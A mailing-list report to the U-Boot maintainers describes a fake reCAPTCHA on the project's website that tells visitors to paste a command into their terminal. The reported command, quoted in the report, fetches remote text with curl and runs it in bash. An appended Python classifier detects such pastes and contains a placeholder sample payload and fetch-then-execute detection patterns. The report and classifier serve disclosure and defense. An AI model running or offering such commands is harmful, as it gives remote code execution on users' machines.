Dear Maintainers,

U-Boot.org seems to be trying to social engineer visitors into executing 
potentially malicious code.

The website presents a seemingly fake reCAPTCHA upon visiting, which after 
ticking the box instructs the user to open their terminal and paste and execute 
a command from the clipboard for "verification".

Said command `curl -s`es some text from a network server and runs it as a bash 
command.

I have not done much analysis on the exact behaviour of the payload, but social 
engineering users into executing arbitrary local payload is not an acceptable 
way of doing web visitor verification.

An example of the clipboard payload I am told to execute (but did not) is (sub 
XXXXXXXX with microzen)
 /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 
'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo ""BotGuard: 
Answer the protector challenge. Ref: 15978 

Best regards,
Mate Kukri
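The report above describes the classic traits of a "paste this into your terminal" lure: a shell spawned on text fetched over the network, transfer errors silenced, a hard-coded OS User-Agent, and a trailing echo that makes the terminal show a fake verification message. The following is an added example, not part of Mate Kukri's report or of the U-Boot project: a small Python classifier a defender could run over clipboard or shell-history contents to flag that pattern. The sample payload it checks is constructed here to mirror the shape of the reported one, with the real host replaced by the placeholder `abcd1234.example.invalid`.

```python
import re

# Constructed sample in the shape of the reported payload; the host and the
# query token are placeholders, not the values from the report.
SAMPLE_PAYLOAD = (
    '/bin/bash -c "$(curl -A \'Mac OS X 10_15_7\' -fsSL '
    '\'abcd1234.example.invalid/?=check&&actmn=PLACEHOLDER\')"; '
    'echo "BotGuard: Answer the protector challenge. Ref: 00000"'
)

# bash -c "$(curl ...)"  or  curl ... | bash : remote text executed directly.
FETCH_THEN_EXEC = re.compile(
    r'\b(?:ba)?sh\b\s+-c\s+["\']?\$\(\s*(?:curl|wget)\b'
    r'|\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b',
    re.IGNORECASE,
)
# The curl/wget invocation itself, up to a pipe, separator or closing paren.
FETCH_SEGMENT = re.compile(r'\b(?:curl|wget)\b[^|;)]*', re.IGNORECASE)
# A User-Agent naming an OS lets the server hand out a per-platform payload.
SPOOFED_UA = re.compile(
    r'(?:-A|--user-agent)\s+["\']?[^"\']*(?:Mac OS X|Windows|Linux)',
    re.IGNORECASE,
)
# -s (or bundled, e.g. -fsSL) hides transfer errors from the victim.
SILENT_FLAGS = re.compile(r'\s-[A-Za-z]*s[A-Za-z]*\b')
# A message echoed after the payload so the terminal looks like a check passed.
DECOY_ECHO = re.compile(r';\s*echo\s+["\']*\w')


def classify_paste(cmd: str) -> dict:
    """Return the indicators found in a pasted command and a verdict.

    Only fetch-then-execute blocks; a plain download or a plain shell
    command is allowed, even if it carries the secondary indicators.
    """
    findings = []
    blocking = bool(FETCH_THEN_EXEC.search(cmd))
    if blocking:
        findings.append("fetch-then-execute: remote text run directly by a shell")
    seg = FETCH_SEGMENT.search(cmd)
    if seg:
        fetch = seg.group(0)
        if SILENT_FLAGS.search(fetch):
            findings.append("download errors silenced (-s)")
        if SPOOFED_UA.search(fetch):
            findings.append("hard-coded OS User-Agent (server can tailor the payload)")
    if DECOY_ECHO.search(cmd):
        findings.append("decoy echo after the payload mimicking a verification step")
    return {"verdict": "block" if blocking else "allow", "findings": findings}


if __name__ == "__main__":
    for candidate in (
        SAMPLE_PAYLOAD,
        "ls -la /tmp",
        "curl -fsSL https://example.invalid/f.tar.gz -o f.tar.gz",
        "curl -fsSL https://example.invalid/install.sh | bash",
    ):
        result = classify_paste(candidate)
        print(result["verdict"], candidate[:60])
        for finding in result["findings"]:
            print("   -", finding)
```

The verdict deliberately keys on the fetch-and-execute combination alone; the other indicators are reported as context so an analyst can see why a paste looked like a lure rather than an ordinary download.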
